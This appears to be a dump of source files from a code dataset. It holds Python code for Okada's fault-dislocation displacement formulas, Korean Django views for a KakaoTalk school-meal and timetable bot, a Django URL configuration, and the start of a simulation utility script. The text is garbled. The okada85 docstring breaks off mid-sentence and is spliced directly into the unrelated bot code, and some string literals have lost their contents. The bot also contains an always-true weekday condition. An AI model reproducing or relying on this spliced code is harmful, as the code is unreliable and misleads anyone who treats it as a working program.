x axis along strike direction)\n argZ = np.pi/2.0 - strike\n\n # rotation matrix which changes the reference frame to that used by\n # okada92 \n R = rotation_3d(-argZ,0.0,0.0)\n\n # rotate coordinate system of points\n p = np.einsum('ij,kj->ki',R,p)\n \n # shift along the dip direction so that the origin coincides with \n # the okada92 origin\n p[:,1] += width*np.cos(dip)\n\n out = okada92(p[:,0],p[:,1],p[:,2],\n slip,length,width,\n c,dip,output_type,lamb,mu) \n\n out = np.array(out).transpose()\n\n # the current output is in the okada92 coordinate system and needs\n # to be rotated back to the original \n R = rotation_3d(argZ,0.0,0.0)\n out = np.einsum('ij,kj->ki',R,out)\n\n return out\n\n\ndef okada92(x,y,z,U,L,W,c,delta,output,lamb=3.2e10,mu=3.2e10):\n '''\n computes displacements resulting from a rectangular dislocation in \n a 3-D halfspace. The notation used here coincides with that used \n by Okada 92. See figure 3 in Okada 92 for a schematic illustration\n of the input parameters. \n\n Parameters\n ----------\n \n x: 1-D array of length N containing x coordinates of output points\n\n y: 1-D array of length N containing y coordinates of output points\n\n z: 1-D array of length N containing z coordinates of output points\n\n U: length 3 sequence describing fault motion. The components \n describe left-lateral, thrust, and tensile motion\n\n c: Depth to the base of the fault (see figure 3 in Okada 92)\n\n delta: fault angle with respect to the horizontal plane. Values \n should be between 0 and pi/2\n\n output: type of output to produce. Either 'disp', 'dudx', 'dudy', \n or 'dudz' \n\n lamb: (optional) scalar for the first Lame parameter\n\n mu: (optional) scalar for the second Lame parameter\n \n Returns\n -------\n\n tuple where each components is a vector of either diplacement or \n displacement derivatives in the x, y, or z direction\n\n ''' \n sindel = np.sin(delta)\n cosdel = np.cos(delta)\n points = len(x)\n alpha = (lamb + mu)/(lamb + 2*mu)\n\n def f(eps,eta,zeta,term,direction):\n X = np.zeros(points)\n R = np.zeros(points)\n y_bar = np.zeros(points)\n c_bar = np.zeros(points)\n d_bar = np.zeros(points)\n X11 = np.zeros(points)\n X32 = np.zeros(points)\n X53 = np.zeros(points)\n Y11 = np.zeros(points)\n Y32 = np.zeros(points)\n Y53 = np.zeros(points)\n h = np.zeros(points)\n theta = np.zeros(points)\n logReps = np.zeros(points)\n logReta = np.zeros(points)\n I1 = np.zeros(points)\n I2 = np.zeros(points)\n I3 = np.zeros(points)\n I4 = np.zeros(points)\n K1 = np.zeros(points)\n K2 = np.zeros(points)\n K3 = np.zeros(points)\n K4 = np.zeros(points)\n D11 = np.zeros(points)\n J1 = np.zeros(points)\n J2 = np.zeros(points)\n J3 = np.zeros(points)\n J4 = np.zeros(points)\n J5 = np.zeros(points)\n J6 = np.zeros(points)\n E = np.zeros(points)\n F = np.zeros(points)\n G = np.zeros(points)\n H = np.zeros(points)\n P = np.zeros(points)\n Q = np.zeros(points)\n Ep = np.zeros(points)\n Fp = np.zeros(points)\n Gp = np.zeros(points)\n Hp = np.zeros(points)\n Pp = np.zeros(points)\n Qp = np.zeros(points)\n\n d = c - zeta\n p = y*cosdel + d*sindel\n q = y*sindel - d*cosdel\n R = np.sqrt(eps**2 + eta**2 + q**2)\n\n X = np.sqrt(eps**2 + q**2) \n y_bar = eta*cosdel + q*sindel\n d_bar = eta*sindel - q*cosdel\n c_bar = d_bar + zeta\n h = q*cosdel - zeta\n\n idx = np.abs(q) < tol \n nidx = np.abs(q) >= tol \n theta[nidx] = np.arctan(eps[nidx]*eta[nidx]/(q[nidx]*R[nidx]))\n\n idx = np.abs(R + eps) < tol\n nidx = np.abs(R + eps) >= tol\n X11[nidx] = 1.0/(R[nidx]*(R[nidx] + eps[nidx]))\n X32[nidx] = 
((2*R[nidx] + eps[nidx])/(R[nidx]**3*\n (R[nidx] + eps[nidx])**2))\n X53[nidx] = ((8*R[nidx]**2 + 9*R[nidx]*eps[nidx] + \n 3*eps[nidx]**2)/(R[nidx]**5*\n (R[nidx] + eps[nidx])**3.0))\n logReps[idx] = -np.log(R[idx] - eps[idx]) \n logReps[nidx] = np.log(R[nidx] + eps[nidx]) \n\n idx = np.abs(R + eta) < tol\n nidx = np.abs(R + eta) >= tol\n Y11[nidx] = 1.0/(R[nidx]*(R[nidx] + eta[nidx]))\n Y32[nidx] = ((2*R[nidx] + eta[nidx])/(R[nidx]**3*\n (R[nidx] + eta[nidx])**2))\n Y53[nidx] = ((8*R[nidx]**2 + 9*R[nidx]*eta[nidx] + \n 3*eta[nidx]**2)/(R[nidx]**5*\n ((R[nidx] + eta[nidx])**3)))\n logReta[idx] = -np.log(R[idx] - eta[idx])\n logReta[nidx] = np.log(R[nidx] + eta[nidx])\n \n if np.abs(cosdel) >= tol:\n I3 = (y_bar/(cosdel*(R + d_bar)) - 1/cosdel**2*\n (logReta - sindel*np.log(R + d_bar)))\n nidx = np.abs(eps) >= tol\n idx = np.abs(eps) < tol\n I4[nidx] = ((sindel*eps[nidx])/(cosdel*(R[nidx] + d_bar[nidx])) + \n 2.0/cosdel**2*\n np.arctan((eta[nidx]*(X[nidx] + q[nidx]*cosdel) + \n X[nidx]*(R[nidx] + X[nidx])*sindel)/\n (eps[nidx]*(R[nidx] + X[nidx])*cosdel)))\n I4[idx] = (0.5*(eps[idx]*y_bar[idx])/\n (R[idx] + d_bar[idx])**2.0) \n else:\n I3 = (0.5*(eta/(R + d_bar) + (y_bar*q)/\n (R + d_bar)**2 - logReta))\n I4 = 0.5*(eps*y_bar)/(R + d_bar)**2 \n\n\n I2 = np.log(R + d_bar) + I3*sindel\n I1 = -eps/(R + d_bar)*cosdel - I4*sindel\n Y0 = Y11 - eps**2*Y32\n Z32 = sindel/R**3 - h*Y32\n Z53 = 3*sindel/R**5 - h*Y53\n Z0 = Z32 - eps**2*Z53\n \n D11 = 1.0/(R*(R + d_bar))\n J2 = eps*y_bar/(R + d_bar)*D11\n J5 = -(d_bar + y_bar**2/(R + d_bar))*D11\n\n if np.abs(cosdel) >= tol:\n K1 = eps/cosdel*(D11 - Y11*sindel)\n K3 = 1.0/cosdel*(q*Y11 - y_bar*D11)\n J3 = 1.0/cosdel*(K1 - J2*sindel)\n J6 = 1.0/cosdel*(K3 - J5*sindel)\n else:\n K1 = eps*q/(R + d_bar)*D11\n K3 = (sindel/(R + d_bar)*\n (eps**2*D11 - 1))\n J3 = (-eps/(R + d_bar)**2*\n (q**2*D11 - 0.5))\n J6 = (-y_bar/(R + d_bar)**2*\n (eps**2*D11 - 0.5))\n \n K4 = eps*Y11*cosdel - K1*sindel\n K2 = 1.0/R + K3*sindel\n J4 = -eps*Y11 - J2*cosdel + J3*sindel\n J1 = J5*cosdel - J6*sindel\n E = sindel/R - y_bar*q/R**3\n F = d_bar/R**3 + eps**2*Y32*sindel\n G = 2.0*X11*sindel - y_bar*q*X32\n H = d_bar*q*X32 + eps*q*Y32*sindel\n P = cosdel/R**3 + q*Y32*sindel\n Q = 3*c_bar*d_bar/R**5 - (zeta*Y32 + Z32 + Z0)*sindel\n Ep = cosdel/R + d_bar*q/R**3\n Fp = y_bar/R**3 + eps**2*Y32*cosdel\n Gp = 2.0*X11*cosdel + d_bar*q*X32\n Hp = y_bar*q*X32 + eps*q*Y32*cosdel\n Pp = sindel/R**3 - q*Y32*cosdel\n Qp = (3*c_bar*y_bar/R**5 + \n q*Y32 - (zeta*Y32 + Z32 + Z0)*cosdel)\n\n if output == 'disp':\n if direction == 'strike':\n if term == 'A':\n f1 = theta/2.0 + alpha/2.0*eps*q*Y11 \n f2 = alpha/2.0*q/R\n f3 = (1-alpha)/2.0*logReta - alpha/2.0*q**2*Y11\n if term == 'B':\n f1 = -eps*q*Y11 - theta - (1- alpha)/alpha*I1*sindel\n f2 = -q/R + (1-alpha)/alpha*y_bar/(R+d_bar)*sindel\n f3 = q**2*Y11 - (1 - alpha)/alpha*I2*sindel\n if term == 'C':\n f1 = (1-alpha)*eps*Y11*cosdel - alpha*eps*q*Z32\n f2 = ((1-alpha)*(cosdel/R + 2*q*Y11*sindel) - \n alpha*c_bar*q/R**3)\n f3 = ((1-alpha)*q*Y11*cosdel - alpha*(c_bar*eta/R**3 - \n zeta*Y11 + eps**2*Z32))\n if direction == 'dip':\n if term == 'A':\n f1 = alpha/2.0*q/R\n f2 = theta/2.0 + alpha/2.0*eta*q*X11\n f3 = (1-alpha)/2.0*logReps - alpha/2.0*q**2*X11\n if term == 'B':\n f1 = -q/R + (1 - alpha)/alpha*I3*sindel*cosdel\n f2 = (-eta*q*X11 - theta - (1-alpha)/alpha*\n eps/(R + d_bar)*sindel*cosdel)\n f3 = q**2*X11 + (1-alpha)/alpha*I4*sindel*cosdel\n if term == 'C':\n f1 = ((1-alpha)*cosdel/R - q*Y11*sindel - alpha*c_bar*q/R**3)\n f2 = (1 - 
alpha)*y_bar*X11 - alpha*c_bar*eta*q*X32\n f3 = (-d_bar*X11 - eps*Y11*sindel - \n alpha*c_bar*(X11 - q**2*X32))\n if direction == 'tensile':\n if term == 'A':\n f1 = -(1 - alpha)/2.0*logReta - alpha/2.0*q**2*Y11\n f2 = -(1 - alpha)/2.0*logReps - alpha/2.0*q**2*X11\n f3 = theta/2.0 - alpha/2.0*q*(eta*X11 + eps*Y11)\n if term == 'B':\n f1 = q**2*Y11 - (1 - alpha)/alpha*I3*sindel**2 \n f2 = (q**2*X11 + \n (1 - alpha)/alpha*eps / (R + d_bar)*sindel**2)\n f3 = (q*(eta*X11 + eps*Y11) - theta - \n (1 - alpha)/alpha*I4*sindel**2)\n if term == 'C':\n f1 = (-(1 - alpha)*(sindel/R + q*Y11*cosdel) - \n alpha*(zeta*Y11 - q**2*Z32))\n f2 = ((1 - alpha)*2.0*eps*Y11 *sindel + d_bar*X11 - \n alpha*c_bar*(X11 - q**2*X32))\n f3 = ((1 - alpha)*(y_bar*X11 + eps*Y11*cosdel) + \n alpha*q*(c_bar*eta*X32 + eps*Z32))\n\n if output == 'dudx':\n if direction == 'strike':\n if term == 'A':\n f1 = -(1-alpha)/2.0*q*Y11 - alpha/2.0*eps**2*q*Y32\n f2 = -alpha/2.0*eps*q/R**3\n f3 = (1 - alpha)/2.0*eps*Y11 + alpha/2.0*eps*q**2*Y32\n if term == 'B':\n f1 = eps**2*q*Y32 -(1 - alpha)/alpha*J1*sindel\n f2 = eps*q/R**3 -(1 - alpha)/alpha*J2*sindel\n f3 = -eps*q**2*Y32 -(1 - alpha)/alpha*J3*sindel\n if term == 'C':\n f1 = (1 - alpha)*Y0*cosdel - alpha*q*Z0\n f2 = (-(1 - alpha) *eps*(cosdel/R**3 + \n 2.0*q*Y32*sindel) + alpha* 3.0*c_bar*eps*q/R**5)\n f3 = (-(1 - alpha)*eps*q*Y32*cosdel + \n alpha*eps*(3.0*c_bar*eta/R**5 - zeta*Y32 - Z32 - Z0))\n if direction == 'dip':\n if term == 'A':\n f1 = -alpha/2.0*eps*q/R**3\n f2 = -q/2.0*Y11 - alpha/2.0*eta*q/R**3\n f3 = (1 - alpha)/2.0*1.0/R + alpha/2.0*q**2/R**3\n if term == 'B':\n f1 = eps*q/R**3 + (1 - alpha)/alpha*J4*sindel*cosdel\n f2 = (eta*q/R**3 + q*Y11 + \n (1 - alpha)/alpha*J5*sindel*cosdel)\n f3 = (-q**2/R**3 + (1- alpha)/alpha*J6*sindel*cosdel)\n if term == 'C':\n f1 = (-(1 - alpha)* eps/R**3*cosdel + \n eps*q*Y32*sindel + alpha*3*c_bar*eps*q/R**5)\n f2 = (-(1 - alpha)* y_bar/R**3 + alpha*3*c_bar*eta*q/R**5)\n f3 = (d_bar/R**3 - Y0*sindel + alpha*c_bar/R**3*(1 - 3*q**2/R**2))\n if direction == 'tensile':\n if term == 'A':\n f1 = -(1 - alpha)/2.0*eps*Y11 + alpha/2.0*eps*q**2*Y32\n f2 = (-(1 - alpha)/2.0*1.0/R + alpha/2.0*q**2/R**3)\n f3 = -(1 - alpha)/2.0*q*Y11 - alpha/2.0*q**3*Y32\n if term == 'B':\n f1 = (-eps*q**2*Y32 - (1 - alpha)/alpha*J4*sindel**2)\n f2 = (-q**2/R**3 - (1 - alpha)/alpha*J5*sindel**2)\n f3 = q**3*Y32 - (1 - alpha)/alpha*J6*sindel**2\n if term == 'C':\n f1 = ((1 - alpha)*eps/R**3*sindel + eps*q*Y32*cosdel + \n alpha*eps*(3*c_bar*eta/R**5 - 2.0*Z32 - Z0))\n f2 = ((1 - alpha)*2.0*Y0*sindel - d_bar/R**3 + \n alpha*c_bar/R**3*(1 - 3.0*q**2/R**2))\n f3 = (-(1- alpha)*(y_bar/R**3 - Y0*cosdel) - \n alpha*(3*c_bar*eta*q/R**5 - q *Z0))\n \n if output == 'dudy':\n if direction == 'strike':\n if term == 'A':\n f1 = (1-alpha)/2.0*eps*Y11*sindel + d_bar/2.0*X11 + alpha/2.0*eps *F\n f2 = alpha/2.0*E\n f3 = (1 - alpha)/2.0*(cosdel/R + q*Y11*sindel) - alpha/2.0*q*F\n if term == 'B':\n f1 = -eps*F - d_bar*X11 + (1- alpha)/alpha*(eps*Y11 + J4)*sindel\n f2 = -E + (1- alpha)/alpha*(1.0/R + J5)*sindel\n f3 = q*F - (1 - alpha)/alpha*(q*Y11 - J6)*sindel\n if term == 'C':\n f1 = -(1.0 - alpha)*eps*P*cosdel - alpha*eps*Q\n f2 = (2*(1.0 - alpha)*(d_bar/R**3 - Y0*sindel)*sindel - \n y_bar/R**3*cosdel - \n alpha*((c_bar + d_bar)/R**3*sindel - \n eta/R**3 - 3.0*c_bar*y_bar*q/R**5))\n f3 = (-(1-alpha)*q/R**3 + \n (y_bar/R**3 - Y0*cosdel)*sindel + \n alpha*((c_bar + d_bar)/R**3*cosdel + \n 3.0*c_bar*d_bar*q/R**5 - (Y0*cosdel + q*Z0)*sindel))\n if direction == 'dip':\n if term == 'A':\n f1 
= alpha/2.0*E\n f2 = (1 -alpha)/2.0*d_bar*X11 + eps/2.0*Y11*sindel + alpha/2.0*eta*G\n f3 = (1 -alpha)/2.0*y_bar*X11- alpha/2.0*q*G\n if term == 'B':\n f1 = -E + (1- alpha)/alpha*J1*sindel*cosdel\n f2 = -eta*G - eps*Y11*sindel + (1- alpha)/alpha*J2*sindel*cosdel\n f3 = q*G + (1- alpha)/alpha*J3*sindel*cosdel\n if term == 'C':\n f1 = (-(1 - alpha)*eta/R**3 + Y0*sindel**2 - \n alpha*((c_bar+d_bar)/R**3*sindel - \n 3*c_bar*y_bar*q/R**5))\n f2 = ((1 - alpha)*(X11 - y_bar**2*X32) - \n alpha*c_bar*((d_bar + 2.0*q*cosdel)*X32 - y_bar*eta*q*X53))\n f3 = (eps*P*sindel + y_bar*d_bar*X32 + \n alpha*c_bar*((y_bar + 2*q*sindel)*X32 - \n y_bar*q**2*X53))\n if direction == 'tensile':\n if term == 'A':\n f1 = -(1 - alpha)/2.0*(cosdel/R + q*Y11*sindel) - alpha/2.0*q*F\n f2 = -(1 - alpha)/2.0*y_bar*X11 - alpha/2.0*q*G\n f3 = (1 - alpha)/2.0*(d_bar*X11 + eps*Y11*sindel) + alpha/2.0*q*H\n if term == 'B':\n f1 = q*F - (1- alpha)/alpha*J1*sindel**2\n f2 = q*G - (1- alpha)/alpha*J2*sindel**2\n f3 = -q*H - (1- alpha)/alpha*J3*sindel**2\n if term == 'C':\n f1 = ((1 - alpha)*(q/R**3 + Y0*sindel*cosdel) + \n alpha*(zeta/R**3*cosdel + \n 3.0*c_bar*d_bar*q/R**5 - q*Z0*sindel))\n f2 = (-(1-alpha)*2.0*eps*P*sindel - y_bar*d_bar*X32 + \n alpha*c_bar*((y_bar + 2.0*q*sindel)*X32 - \n y_bar*q**2*X53))\n f3 = (-(1 - alpha)*(eps*P*cosdel - X11 + y_bar**2*X32) + \n alpha*c_bar*((d_bar + 2.0*q*cosdel)*X32 - y_bar*eta*q*X53) + \n alpha*eps*Q)\n\n if output == 'dudz':\n if direction == 'strike':\n if term == 'A':\n f1 = ((1 - alpha)/2.0*eps *Y11*cosdel + y_bar/2.0*X11 + \n alpha/2.0*eps*Fp)\n f2 = alpha/2.0*Ep\n f3 = -(1 - alpha)/2.0*(sindel/R - q*Y11*cosdel) - alpha/2.0*q*Fp\n if term == 'B':\n f1 = -eps*Fp - y_bar*X11 + (1 - alpha)/alpha*K1*sindel\n f2 = -Ep + (1 - alpha)/alpha*y_bar*D11*sindel\n f3 = q*Fp + (1 - alpha)/alpha*K2*sindel\n if term == 'C':\n f1 = (1 - alpha)*eps*Pp*cosdel - alpha*eps*Qp\n f2 = (2*(1-alpha)*(y_bar/R**3 - Y0*cosdel)*sindel + \n d_bar/R**3*cosdel - \n alpha*((c_bar + d_bar)/R**3*cosdel + \n 3*c_bar*d_bar*q/R**5))\n f3 = ((y_bar/R**3 - Y0*cosdel)*cosdel - \n alpha*((c_bar + d_bar)/R**3*sindel - \n 3*c_bar*y_bar*q/R**5 - Y0*sindel**2 + \n q*Z0*cosdel))\n if term == 'D':\n f1 = (1-alpha)*eps*Y11*cosdel - alpha*eps*q*Z32\n f2 = ((1-alpha)*(cosdel/R + 2*q*Y11*sindel) - \n alpha*c_bar*q/R**3)\n f3 = ((1-alpha)*q*Y11*cosdel - \n alpha*(c_bar*eta/R**3 - \n zeta*Y11 + eps**2*Z32))\n\n if direction == 'dip':\n if term == 'A':\n f1 = alpha/2.0*Ep\n f2 = (1 - alpha)/2.0*y_bar*X11 + eps/2.0*Y11*cosdel + alpha/2.0*eta*Gp\n f3 = -(1 - alpha)/2.0*d_bar*X11 - alpha/2.0*q*Gp\n if term == 'B':\n f1 = -Ep - (1 - alpha)/alpha*K3*sindel*cosdel\n f2 = (-eta*Gp - eps*Y11*cosdel - \n (1 - alpha)/alpha*eps*D11*sindel*cosdel)\n f3 = q*Gp - (1 - alpha)/alpha*K4*sindel*cosdel\n if term == 'C':\n f1 = (-q/R**3 + Y0*sindel*cosdel - \n alpha*((c_bar + d_bar)/R**3*cosdel + \n 3*c_bar*d_bar*q/R**5))\n f2 = ((1 - alpha)*y_bar*d_bar*X32 - \n alpha*c_bar*((y_bar - 2*q*sindel)*X32 + d_bar*eta*q*X53))\n f3 = (-eps*Pp*sindel + X11 - d_bar**2*X32 - \n alpha*c_bar*((d_bar - 2*q*cosdel)*X32 - \n d_bar*q**2*X53))\n if term == 'D':\n f1 = ((1-alpha)*cosdel/R - q*Y11*sindel - \n alpha*c_bar*q/R**3)\n f2 = (1 - alpha)*y_bar*X11 - alpha*c_bar*eta*q*X32\n f3 = (-d_bar*X11 - eps*Y11*sindel - \n alpha*c_bar*(X11 - q**2*X32))\n if direction == 'tensile':\n if term == 'A':\n f1 = (1 - alpha)/2.0*(sindel/R - q*Y11*cosdel) - alpha/2.0*q*Fp\n f2 = (1 - alpha)/2.0*d_bar*X11 - alpha/2.0*q*Gp\n f3 = (1 - alpha)/2.0*(y_bar*X11 + eps*Y11*cosdel) + 
alpha/2.0*q*Hp\n if term == 'B':\n f1 = q*Fp + (1 - alpha)/alpha*K3*sindel**2\n f2 = q*Gp + (1 - alpha)/alpha*eps*D11*sindel**2\n f3 = -q*Hp + (1 - alpha)/alpha*K4*sindel**2\n if term == 'C':\n f1 = (-eta/R**3 + Y0*cosdel**2 - \n alpha*(zeta/R**3*sindel- \n 3*c_bar*y_bar*q/R**5 - \n Y0*sindel**2 + q*Z0*cosdel))\n f2 = ((1 - alpha)*2*eps*Pp*sindel - X11 + d_bar**2*X32 - \n alpha*c_bar*((d_bar - 2*q*cosdel)*X32 - \n d_bar*q**2*X53))\n f3 = ((1 - alpha)*(eps*Pp*cosdel + y_bar*d_bar*X32) + \n alpha*c_bar*((y_bar - 2*q*sindel)*X32 + d_bar*eta*q*X53) + \n alpha*eps*Qp)\n if term == 'D':\n f1 = (-(1 - alpha)*(sindel/R + q*Y11*cosdel) - \n alpha*(zeta*Y11 - q**2*Z32))\n f2 = ((1 - alpha)*2.0*eps*Y11 *sindel + d_bar*X11 - \n alpha*c_bar*(X11 - q**2*X32))\n f3 = ((1 - alpha)*(y_bar*X11 + eps*Y11*cosdel) + \n alpha*q*(c_bar*eta*X32 + eps*Z32))\n return (f1,f2,f3)\n\n ux = np.zeros(points)\n uy = np.zeros(points)\n uz = np.zeros(points)\n for itr,direction in enumerate(['strike','dip','tensile']):\n p = y*cosdel + (c - z)*sindel\n p_ = y*cosdel + (c + z)*sindel # it is unclear if p_ is needed\n # based on the text. \n fI = f(x,p,z,'A',direction) \n fII = f(x,p - W,z,'A',direction)\n fIII = f(x-L,p,z,'A',direction)\n fIV = f(x-L,p - W,z,'A',direction)\n uA1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uA2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uA3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n fI = f(x,p_,-z,'A',direction)\n fII = f(x,p_ - W,-z,'A',direction)\n fIII = f(x-L,p_,-z,'A',direction)\n fIV = f(x-L,p_ - W,-z,'A',direction)\n uhatA1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uhatA2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uhatA3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n fI = f(x,p,z,'B',direction)\n fII = f(x,p - W,z,'B',direction)\n fIII = f(x-L,p,z,'B',direction)\n fIV = f(x-L,p - W,z,'B',direction)\n uB1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uB2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uB3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n fI = f(x,p,z,'C',direction)\n fII = f(x,p - W,z,'C',direction)\n fIII = f(x-L,p,z,'C',direction)\n fIV = f(x-L,p - W,z,'C',direction)\n uC1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uC2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uC3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n \n if output == 'dudz':\n fI = f(x,p,z,'D',direction)\n fII = f(x,p - W,z,'D',direction)\n fIII = f(x-L,p,z,'D',direction)\n fIV = f(x-L,p - W,z,'D',direction)\n uD1 = fI[0] - fII[0] - fIII[0] + fIV[0] \n uD2 = fI[1] - fII[1] - fIII[1] + fIV[1] \n uD3 = fI[2] - fII[2] - fIII[2] + fIV[2] \n ux += U[itr]/(2*np.pi)*(uA1 + uhatA1 + uB1 + uD1 + z*uC1)\n uy += (U[itr]/(2*np.pi)*((uA2 + uhatA2 + uB2 + uD2 + z*uC2)*cosdel - \n (uA3 + uhatA3 + uB3 + uD3 + z*uC3)*sindel))\n uz += (U[itr]/(2*np.pi)*((uA2 + uhatA2 + uB2 - uD2 - z*uC2)*sindel + \n (uA3 + uhatA3 + uB3 - uD3 - z*uC3)*cosdel))\n else:\n ux += U[itr]/(2*np.pi)*(uA1 - uhatA1 + uB1 + z*uC1)\n uy += (U[itr]/(2*np.pi)*((uA2 - uhatA2 + uB2 + z*uC2)*cosdel - \n (uA3 - uhatA3 + uB3 + z*uC3)*sindel))\n uz += (U[itr]/(2*np.pi)*((uA2 - uhatA2 + uB2 - z*uC2)*sindel + \n (uA3 - uhatA3 + uB3 - z*uC3)*cosdel))\n\n return np.array([ux,uy,uz]) \n\n##------------------------------------------------------------------\ndef okada85(x,y,L,W,d,delta,U): \n ''' \n Description: \n computes displacements at points (x,y) for a fault with \n width W, length L, and depth d. The fault has one end on the \n origin and the other end at (x=L,y=0). Slip on the fault is \n described by U. 
\n Arguments: \n x: along strike coordinate of output locations (can be a vector) \n y: perpendicular to strike coordinate of output locations (can be a vector) \n L: length of fault \n W: width of fault \n d: depth of the bottom of the fault (a fault which ruptures the surface \n with have d=W, and d', '&', '(h)', '.']\n for element_string in element_filter :\n element = element.replace(element_string, '')\n #줄 바꿈 처리\n element = element.replace('
    ', '\\n')\n #모든 공백 삭제\n element = re.sub(r\"\\d\", \"\", element)\n\n #급식이 없을 경우\n except:\n element = \"급식이 먹고싶나?\\n급식이 없다네 핳핳\" # 공백 반환\n return element\n \n#meal = get_diet(2, \"2018.06.15\", 4) #중식, 2017년 11월 17일, 금요일\nmeal1 = get_diet(2, todate, r) #중식, 2017년 11월 17일, 금요일\nmeal2 = get_diet(3, todate, r)\n\nmealD = \"\"\nmealM = \"\"\nbar = \"=====오늘의 급식=====\\n\"\nerror = \"주말과 공휴일에는\\n아무것도 나타나지 않아욥!\"\nmealM += todate+ t[r] + \"요일\\n\" + bar + \"중식\\n\"+ meal1+ bar + error\nmealD += todate+ t[r] + \"요일\\n\" + bar + \"석식\\n\" + meal2 +bar + error\n#========================================오늘의급식end\nsub = t[r] + \"요일 시간표\\n\"\nbar = \"==========\\n\"\ndanger = \"시간표가변경될수있습니다.\"\n\nif t[r] == \"월\":\n classTime = \"1 . 물리\\n2. 생물\\n3. 미적\\n4. 미술\\n5. 영A\\n6. 문A\\n7. 문C\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"화\":\n classTime = \"1 . 미적\\n2. 영A\\n3. 문B\\n4. 일본어/중국어\\n5. 체육A\\n6. 진로\\n7. 화학\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"수\":\n classTime = \"1 . 지구과학\\n2. 문A\\n3. 물리\\n4. 미술\\n5. 일본어/중국어\\n6. 미적A\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"목\":\n classTime = \"1 . 체육\\n2. 일본어/중국어\\n3. 미적\\n4. 영B\\n5. 미적\\n6. 지구과학\\n7. 문B\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"금\":\n classTime = \"1 . 미적\\n2. 화학\\n3. 생물\\n4. 영A\\n5. 창체\\n6. 창체\\n\"\n class26 = sub + bar + classTime + bar + danger\nelif t[r] == \"토\" or \"일\":\n classTime = \"토,일요일은 수업이 없습니다\\n\"\n class26 = sub + bar + classTime + bar + danger\n#=================================class26end\n\ndef keyboard(request):\n\n return JsonResponse({\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n })\n\n@csrf_exempt\ndef message(request):\n\n json_str = ((request.body).decode('utf-8'))\n received_json_data = json.loads(json_str)\n datacontent = received_json_data['content']\n\n if datacontent == '오늘급식':\n\n return JsonResponse({\n 'message': {\n 'text': '아래 중식, 석식중 선택하세요'\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['중식','석식']\n }\n\n })\n\n elif datacontent == '오늘의명언':\n\n return JsonResponse({\n 'message': {\n 'text': '환곤이 일했는데오류나요...'\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n\n })\n\n elif datacontent == '개발하기까지':\n\n return JsonResponse({\n 'message': {\n 'text': '검색,구상,실현 : 서정현,장환곤\\n항상 조언해주시는 : 갓주현쌤\\n부스운영하러 오셔서 많은정보주신 효진이형\\n>모두 감사드립니다.'\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n })\n\n elif datacontent == '2학년6반시간표':\n\n return JsonResponse({\n 'message': {\n 'text': class26\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n\n })\n\n elif datacontent == '처음으로':\n\n return JsonResponse({\n 'message': {\n 'text': '처음으로'\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n\n })\n elif datacontent == '중식':\n\n return JsonResponse({\n 'message': {\n 'text': mealM\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n })\n\n\n elif datacontent == '석식':\n\n return JsonResponse({\n 'message': {\n 'text': mealD\n },\n 'keyboard': {\n 'type':'buttons',\n 'buttons':['오늘급식','오늘의명언','2학년6반시간표','개발하기까지']\n }\n })\n","repo_name":"rhaxlwo21/ydp_alarm_with_kakaoApi","sub_path":"2018_06_20_views.py","file_name":"2018_06_20_views.py","file_ext":"py","file_size_in_byte":7287,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
+{"seq_id":"5477612308","text":"from django.urls import path\nfrom work.views import WorkListCreateAPIView, WorkRetrieveUpdateDestroyAPIView, WorkCommentListCreateAPIView, WorkCommentRetrieveUpdateDestroyAPIView, WorkLikeListCreateAPIView\nfrom bookmark.views import WorkBookmarkListCreateAPIView, WorkBookmarkRetrieveDestroyAPIView\n\n\napp_name = 'work'\n\nurlpatterns = [\n    # work\n    path(\"\", WorkListCreateAPIView.as_view()),\n    path(\"<int:work_id>/\", WorkRetrieveUpdateDestroyAPIView.as_view()),\n    # work - like\n    path(\"<int:work_id>/likes/\", WorkLikeListCreateAPIView.as_view()),\n    # work - bookmark\n    path(\"<int:work_id>/work_bookmarks/\", WorkBookmarkListCreateAPIView.as_view()),\n    path(\"<int:work_id>/work_bookmarks/<int:work_bookmark_id>/\", WorkBookmarkRetrieveDestroyAPIView.as_view()),\n    # work - workComment\n    path(\"<int:work_id>/work_comments/\", WorkCommentListCreateAPIView.as_view()),\n    path(\"<int:work_id>/work_comments/<int:work_comment_id>/\", WorkCommentRetrieveUpdateDestroyAPIView.as_view()),\n]\n","repo_name":"KimChanJin97/test","sub_path":"webapp/work/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"25247176002","text":"# ---------- Utility script ----------\n# Check simulations that failed and launch them again on the cluster\n# ____________________\n# Valérie Bibeau, 2020\n\nimport os\nimport numpy as np\n\npath = os.getcwd() + \"/\"\n\npath, dirs, files = next(os.walk(path))\nnumber_of_dirs = len(dirs)\n\nprint(\"Total of folders =\", 